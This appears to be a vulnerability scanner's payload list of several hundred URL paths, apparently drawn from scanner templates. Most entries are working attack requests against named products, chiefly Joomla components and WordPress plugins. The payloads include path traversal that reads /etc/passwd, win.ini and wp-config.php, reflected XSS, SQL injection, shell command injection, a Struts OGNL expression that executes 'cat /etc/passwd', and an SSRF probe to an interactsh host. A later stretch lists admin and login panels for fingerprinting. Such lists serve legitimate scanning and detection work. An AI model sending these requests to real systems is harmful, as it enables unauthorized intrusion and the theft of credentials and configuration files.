/index.php?option=com_imagebrowser&folder=../../../../etc/passwd
/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22
/index.php?option=com_jstore&controller=./../../../../../../../../etc/passwd%00
/webadmin/clientlogin/?srid=&action=showdeny&url=
/wlsecurity.html
/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/boards/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/board/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forum/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/forums/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/vb/forumrunner/request.php?d=1&cmd=get_spam_data&postids=-1%27
/services/getFile.cmd?userfile=config.xml
/rest/v1/AccountService/Accounts
/CMSInstall/install.aspx
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd
/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini
/html/log
/../../etc/passwd
/filemanager/upload.php
/wp-content/plugins/wechat-broadcast/wechat/Image.php?url=../../../../../../../../../../etc/passwd
/theme/default/img/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e//etc/passwd
/wp-admin/options-general.php?page=smartcode
/user/scripts/login_par.js
/device.rsp?opt=user&cmd=list
/pages/systemcall.php?command=cat%20/etc/passwd
/cgi-bin/file_transfer.cgi
/wavemaker/studioService.download?method=getContent&inUrl=file///etc/passwd
/wp-content/plugins/gracemedia-media-player/templates/files/ajax_controller.php?ajaxAction=getIds&cfg=../../../../../../../../../../etc/passwd
/index.php/admin/filemanager/sa/getZipFile?path=/../../../../../../../etc/passwd
/cgi-bin/admin.cgi?Command=sysCommand&Cmd={{cmd}}
/wp-content/plugins/cab-fare-calculator/tblight.php?controller=../../../../../../../../../../../etc/passwd%00&action=1&ajax=1
/logs/downloadMainLog?fname=../../../../../../..//etc/passwd
/logs/downloadMainLog?fname=../../../../../../..///config/MPXnode/www/appConfig/userDB.json
/jquery-file-upload/server/php/
/rest/domains/list?sortCol=fullyQualifiedName&sortDir=asc
/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27
/?s=index/index/index
/src/addressbook.php?%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/options.php?optpage=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/search.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&what=x&where=BODY&submit=Search
/src/search.php?mailbox=INBOX&what=x&where=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&submit=Search
/src/help.php?chapter=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/src/redirect.php?plugins[]=../../../../etc/passwd%00
/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php
/adm/file.cgi?next_file=%2fetc%2fpasswd
/components/com_moofaq/includes/file_includer.php?gzip=0&file=/../../../../../etc/passwd
/index.php?option=com_album&Itemid=128&target=../../../../../../../../../etc/passwd
/index.php?option=com_omphotogallery&controller=../../../../../../../../../etc/passwd
/adm/krgourl.php?DOCUMENT_ROOT=http://{{interactsh-url}}
/index.php?option=com_kif_nexus&controller=../../../../../../../../../etc/passwd
/index.php?option=com_biblestudy&id=1&view=studieslist&controller=../../../../../../../../etc/passwd
/plugins/system/cdscriptegrator/libraries/highslide/js/jsloader.php?files[]=/etc/passwd
/index.php?option=com_gcalendar&controller=../../../../../etc/passwd%00
/index.php?option=com_abbrev&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00
/index.php?option=com_webtv&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_addressbook&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_horoscope&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_matamko&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_tweetla&controller=../../../../../../../etc/passwd%00
/index.php?option=com_travelbook&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcomment&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_zimbcore&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_graphics&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_if_surfalert&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_properties&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_orgchart&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_beeheard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multimap&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_multiroot&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_blogfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_gadgetfactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_lovefactory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jwhmcs&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlaflickr&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_redtwitter&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchagallery&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchafieldsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_perchadownloadsattach&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dioneformwizard&controller=../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_mscomment&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jequoteform&view=../../../../../../etc/passwd%00
/index.php?option=com_bfsurvey&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_realtyna&controller=../../../../../../../../../../../../../../../etc/passwd%00
/administrator/components/com_joomla-visites/core/include/myMailer.class.php?mosConfig_absolute_path=../../../../../../../../../../../../etc/passwd
/index.php?option=com_jphone&controller=../../../../../../../../../../etc/passwd%00
/../../../../../../../../../../../../../etc/passwd
/pandora_console/ajax.php?page=../../../../../../etc/passwd
/index.php?option=com_jradio&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jimtawl&Itemid=12&task=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_canteen&controller=../../../../../etc/passwd%00
/index.php?option=com_jejob&view=../../../../../../etc/passwd%00
/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd
/document.php?modulepart=project&file=../../../../../../../etc/passwd
/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00
/?q=node&destination=node
/api/v1/repos/search?q=%27)%09UNION%09SELECT%09*%09FROM%09(SELECT%09null)%09AS%09a1%09%09JOIN%09(SELECT%091)%09as%09u%09JOIN%09(SELECT%09user())%09AS%09b1%09JOIN%09(SELECT%09user())%09AS%09b2%09JOIN%09(SELECT%09null)%09as%09a3%09%09JOIN%09(SELECT%09null)%09as%09a4%09%09JOIN%09(SELECT%09null)%09as%09a5%09%09JOIN%09(SELECT%09null)%09as%09a6%09%09JOIN%09(SELECT%09null)%09as%09a7%09%09JOIN%09(SELECT%09null)%09as%09a8%09%09JOIN%09(SELECT%09null)%09as%09a9%09JOIN%09(SELECT%09null)%09as%09a10%09JOIN%09(SELECT%09null)%09as%09a11%09JOIN%09(SELECT%09null)%09as%09a12%09JOIN%09(SELECT%09null)%09as%09a13%09%09JOIN%09(SELECT%09null)%09as%09a14%09%09JOIN%09(SELECT%09null)%09as%09a15%09%09JOIN%09(SELECT%09null)%09as%09a16%09%09JOIN%09(SELECT%09null)%09as%09a17%09%09JOIN%09(SELECT%09null)%09as%09a18%09%09JOIN%09(SELECT%09null)%09as%09a19%09%09JOIN%09(SELECT%09null)%09as%09a20%09%09JOIN%09(SELECT%09null)%09as%09a21%09%09JOIN%09(SELECT%09null)%09as%09a22%09where%09(%27%25%27=%27
/?option=com_helpdeskpro&task=ticket.download_attachment&filename=/../../../../../../../../../../../../etc/passwd&original_filename=AnyFileName.exe
/cgi-bin/koha/svc/virtualshelves/search?template_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/wp-content/plugins/robotcpa/f.php?l=ZmlsZTovLy9ldGMvcGFzc3dk
/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../wp-config.php
/XMII/Catalog?Mode=GetFileList&Path=Classes/../../../../../../../../../../../../etc/passwd
/servlets/FetchFile?fileName=../../../etc/passwd
/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd
/theme/META-INF/prototype%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%af..%c0%afwindows/win.ini
/wp-content/plugins/delightful-downloads/assets/vendor/jqueryFileTree/connectors/jqueryFileTree.php
/%5C../ssl/yaws-key.pem
/typo3conf/ext/restler/vendor/luracast/restler/public/examples/resources/getsource.php?file=../../../../../../../LocalConfiguration.php
/cgi-bin/webproc?getpage=/etc/passwd&var:language=en_us&var:page=wizardfifth
/.../.../.../.../.../.../.../.../.../windows/win.ini
/.../.../.../.../.../.../.../.../.../etc/passwd
/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd
/verify.php?id=1&confirm_hash=
/mantis/verify.php?id=1&confirm_hash=
/mantisBT/verify.php?id=1&confirm_hash=
/mantisbt-2.3.0/verify.php?id=1&confirm_hash=
/bugs/verify.php?confirm_hash=&id=1
/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0
/+CSCOU+/../+CSCOE+/files/file_list.json?path=/sessions
/command.cgi?cat%20/etc/passwd
/uir//etc/passwd
/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd
/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/etc/passwd
/img.php?f=/./etc/./passwd
/index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
/meta
/ipecs-cm/download?filename=../../../../../../../../../../etc/passwd&filepath=/home/wms/www/data
/ipecs-cm/download?filename=jre-6u13-windows-i586-p.exe&filepath=../../../../../../../../../../etc/passwd%00.jpg
/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd
/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD=
/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd
/wp-content/plugins/localize-my-post/ajax/include.php?file=../../../../../../../../../../etc/passwd
/../../../../../../../../../../../../etc/passwd
/index.php?q=file:///etc/passwd
/index.php?option=com_jtagmembersdirectory&task=attachment&download_file=../../../../../../../../../../../etc/passwd
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php
/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd
/..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd
/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd
/catalog.php?filename=../../../../../../../../../etc/passwd
/cgi-bin/config.exp
/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fwindows%2Fwin.ini
/?c=../../../../../../etc/passwd%00
/badging/badge_print_v0.php?tpl=../../../../../etc/passwd
/wlmeng/../../../../../../../../../../../etc/passwd%00index.htm
/admin.html?s=admin/api.Update/get/encode/34392q302x2r1b37382p382x2r1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b1a1a1b2t382r1b342p37373b2s
/wp-json/wp/v2/lesson/1
/advanced_component_system/index.php?ACS_path=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00
/index.php?page_slug=../../../../../etc/passwd%00
/file?valore=../../../../../windows/win.ini
/oliver/FileServlet?source=serverFile&fileName=c:/windows/win.ini
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green
/filter/jmol/js/jsmol/php/jsmol.php?call=getRawDataFromDatabase&query=file:///etc/passwd
/core/config/databases.yml
/configuration.yml
/config/configuration.yml
/redmine/config/configuration.yml
/debug/
/_vti_pvt/service.pwd
/admin/
/solr/admin/

/mongo-express/
/db/admin/system.users
/sensorlist.htm
/avatar_uploader.pages.inc?file=%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E
/./../../../../../../../../../../etc/passwd
/index.php?option=com_jvehicles&controller=../../../../../../../../../../etc/passwd%00
/webadmin/reporter/view_server_log.php?server=localhost&act=stats&filename=&offset=1&count=1000&sortorder=&log=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&offset=&sortitem=&filter=
/loyalty_enu/start.swe/%3E%22%3E%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/cgi-bin/operator/fileread?READ.filePath=/etc/passwd
/password.cgi
/exportFile?UID=..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5cwindows%5cwin.ini
/download?type=files&filename=../../../../../../../../etc/passwd
/index.php?option=com_fabrik&task=plugin.pluginAjax&plugin=image&g=element&method=onAjax_files&folder=../../../../../../../../../../../../../../../etc/
/js/../../../../../../../../etc/passwd%00.jpg
/ftb.imagegallery.aspx
/file=C:%5CWindows%5Cwin.ini
/css_parser.php?css=css_parser.php
/opensis/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/ajax.php?modname=misc/../../../../../../../../../../../../../etc/passwd&bypass=Transcripts.php
/cs/career/getSurvey.jsp?fn=../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../../etc/passwd
/webshell4/login.php?err=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/webshell4/login.php?login=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/login.php/
/phpwiki/index.php/passwd
/pmb/opac_css/getgif.php?chemin=../../../../../../etc/passwd&nomgif={{rand_base(4)}}
/pacs/nocache.php?path=%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cWindows%5cwin.ini
/lan.html
/Solar_Image.php?mode=resize&fname=test%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?content=../../../../../../../../etc/passwd
/tiki-5.2/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/tiki-edit_wiki_section.php?type=%22%3E%3Cscript%3Ealert(31337)%3C/script%3E
/wt3/forceSave.php?file=/etc/passwd
/download.do?file=../../../../config.text
/src/read_body.php?mailbox=/etc/passwd&passed_id=1&
/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd
/wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd
/wp-content/plugins/brandfolder/callback.php?wp_abspath=../../../wp-config.php%00
/wp-content/plugins/boldgrid-backup/cron/restore-info.json
/wp-content/plugins/wordfence/lib/wordfenceClass.php?file=/../../../../../../etc/passwd
/wp-content/plugins/FlagEm/flagit.php?cID=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/mdocs-posts/?mdocs-img-preview=../../../wp-config.php
/?mdocs-img-preview=../../../wp-config.php
/wp-content/plugins/nextgen-gallery/nggallery.php?test-head=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/phpfreechat/lib/csstidy-1.2/css_optimiser.php?url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/securimage-wp/siwp_test.php/%22/%3E%3Cscript%3Ealert(1);%3C/script%3E?tested=1
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?randomId=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPlugin/slideshow.php?slides[0][type]=text&slides[0][title]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/settings.php?settings[][group]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
/wp-content/plugins/slideshow-jquery-image-gallery/views/SlideshowPluginPostType/style-settings.php?settings[0]&inputFields[0]=%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E
/wp-content/plugins/socialfit/popup.php?service=googleplus&msg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/wp-content/plugins/tutor/views/pages/instructors.php?sub_page=/etc/passwd
/?wpv-image=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
/htmlcode/html/indexdefault.asp
/CFIDE/componentutils/login.cfm
/cfide/componentutils/login.cfm
/cgi-bin/webcm?getpage=../html/login.html
/aims/ps/
/login.htm
/desktop/container/landing.jsp?locale=en_US
/login.html
/#connection
/fmi/webd/
/login
/WebInterface/login.html
/status.php
/PRESENTATION/EPSONCONNECT
/cgi-bin/home
/webalizer/
/sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html
/sap/bc/ui5_ui5/ui2/ushell/shells/abap/FioriLaunchpad.html?saml2=disabled
/login.sh
/CHANGELOG.md
/glpi/
/standard/default.php
/names.nsf
/webredir.nsf
/Account/Login
/ui/login/
/ui/favicon.ico
/jupyter/login
/jupyter/lab
/jupyter/hub/lti/launch
/hub/login
/login#goto=%2Fdashboard
/dashboard/
/start.html
/www/start.html
/logon/LogonPoint/tmindex.html
/status.htm
/action/login.html
/index.php
/dashboard/auth/login/
/horizon/auth/login/?next=/horizon/
/auth/login/?next=/
/opennms/login.jsp
/pandora_console/mobile/
/login_up.php
/auth/login
/
/admin.php
/radiusmanager/user.php
/user.php
/?locale=en
/login.zul
/Sitefinity/Authenticate/SWT
/admin/spider.php
/sphider/admin/admin.php
/search/admin/admin.php
/src/login.php
/webmail/src/login.php
/squirrelmail/src/login.php
/sws/index.sws
/cgi-bin/luci
/weblogin.htm
/portal/webclient/index.html
/sslvpn_logon.shtml
/home.html
/webmodule-ee/login.seam
/carbon/admin/login.jsp
/zdm/login_xdm_uc.jsp
/zimbraAdmin/
/CGI/Java/Serviceability?adapter=device.statistics.configuration
/_vti_bin/Authentication.asmx?op=Mode
/loadtextfile.htm#programinfo
/.idea/WebServers.xml
/.idea/webServers.xml
/.idea/webservers.xml
/fcgi-bin/echo
/index.html
/#
/index.htm
/SSI/index.htm
/default.htm
/view/viewer_index.shtml
/pics/logo_70x29px.gif
/cgi-bin/guestimage.html
/Login.htm
/Pages/login.htm
/web-console/ServerInfo.jsp
/RichWidgets/Popup_Upload.aspx
/cgi-bin/apcupsd/multimon.cgi
/cgi-bin/multimon.cgi
/js/app/init.js
/resin-doc/viewfile/?file=/WEB-INF/resin-web.xml
/%20../web-inf/web.xml
/wp-content/plugins/bbpress/
/wp-content/plugins/elementor/
/wp-content/plugins/gtranslate/
/wp-content/plugins/redirection/
/wp-content/plugins/updraftplus/includes/
/wp-content/plugins/woocommerce/
/wp-content/plugins/123contactform-for-wordpress/
/wp-content/plugins/arforms/
/wp-content/plugins/idx-broker-platinum/
/wp-content/plugins/iwp-client/
/wp-content/plugins/lifterlms/
/wp-content/plugins/ultimate-member/
/wp-content/plugins/sfwd-lms/
/contrib/acog/print_form.php?formname=../../../etc/passwd%00
/web_caps/webCapsConfig
/wp-content/plugins/email-subscribers
/wp-content/plugins/super-forms/
/wp-json/wp/v2/users/
/?rest_route=/wp/v2/users/
/mail/src/compose.php?mailbox=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/names.nsf/People?OpenView
/plugins/address_add/add.php?first=HOVER%20ME!%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd
/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test
/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd
/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00
/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1
/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00
/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd
/comm.php?id=../../../../../../../../../../etc/passwd
/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd
/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E
/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00
/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1
/index.php?option=com_projectfork&section=../../../../../../../../etc/passwd
/index.php?option=com_agora&task=profile&page=avatars&action=../../../../../../../../etc/passwd
/wgarcmin.cgi?NEXTPAGE=D&ID=1&DOC=../../../../etc/passwd
/index.php?option=com_ccnewsletter&controller=../../../../../../../../../../etc/passwd%00
/plugins/content/jw_allvideos/includes/download.php?file=../../../../../../../../etc/passwd
/index.php?option=com_jvideodirect&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jashowcase&view=jashowcase&controller=../../../../../../../etc/passwd%00
/index.php?option=com_jcollection&controller=../../../../../../../etc/passwd%00
/index.php?option=com_cartweberp&controller=../../../../../../../../etc/passwd
/index.php?option=com_rokdownloads&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_communitypolls&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_jeformcr&view=../../../../../../../../etc/passwd%00
/index.php?option=com_janews&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_dwgraphs&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_userstatus&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jinventory&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_joomlaupdater&controller=../../../../../../../etc/passwd%00
/index.php?option=com_svmap&controller=../../../../../../../etc/passwd%00
/index.php?option=com_news_portal&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_sebercart&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_hsconfig&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_weberpcustomer&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jresearch&controller=../../../../../../../../etc/passwd%00
/index.php?option=com_ckforms&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_loginbox&view=../../../../../../../../../etc/passwd%00
/index.php?option=com_vjdeo&controller=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jprojectmanager&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_sweetykeeper&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_preventive&controller==../../../../../../../../../../etc/passwd%00
/index.php?option=com_alphauserpoints&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_jfeedback&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_mmsblog&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_awdwall&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_powermail&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_shoutbox&controller=../../../../../../../etc/passwd%00
/index.php?option=com_myblog&Itemid=1&task=../../../../../../../../etc/passwd%00
/index.php?option=com_jacomment&view=../../../../../../../../../../etc/passwd%00
/index.php?option=com_wmi&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_smartsite&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_noticeboard&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_ultimateportfolio&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_arcadegames&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_onlineexam&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_archeryscores&controller=../../../../../../../../../etc/passwd%00
/index.php?option=com_mtfireeagle&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_market&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_drawroot&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_smestorage&controller=../../../../../../../../../etc/passwd%00
/lui/
/hub/
/index.php?option=com_datafeeds&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00
/index.php?option=com_javoice&view=../../../../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_simpledownload&task=download&fileid=../../../../../../../../../../etc/passwd%00
/index.php?option=com_picasa2gallery&controller=../../../../../../../../../../../../../../etc/passwd%00
/propertyfinder/component/jesectionfinder/?view=../../../../../../../../../../../../../etc/passwd
/component/music/album.html?cid=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_foobla_suggestions&controller=../../../../../../../../../../../../etc/passwd%00
/index.php?option=com_picsell&controller=prevsell&task=dwnfree&dflink=../../../configuration.php
/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00
/manager/controllers/default/resource/tvs.php?class_key=../../../../../../../../../../windows/win.ini%00
/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd
/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00
/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00
/devmode.action?debug=command&expression=(%23_memberAccess[%22allowStaticMethodAccess%22]%3Dtrue%2C%23foo%3Dnew%20java.lang.Boolean(%22false%22)%20%2C%23context[%22xwork.MethodAccessor.denyMethodExecution%22]%3D%23foo%2C@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%27cat%20/etc/passwd%27).getInputStream()))
/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}
/index.php?r=i/../../../../../etc/passwd
/index.php?class=../../../../../../../etc/passwd%00
/reports/rwservlet/showenv
/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///
/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00
/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E
/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E
/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open
/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\..\..\windows\win.ini
/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\..\..\windows\win.ini
/index.action?redirect:http://www.interact.sh/
{{paths}}
/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd
/index.php?p=../../../../../../../../../../../../../../../../etc/passwd%00index&q=About&ajax=true&_=1355714673828
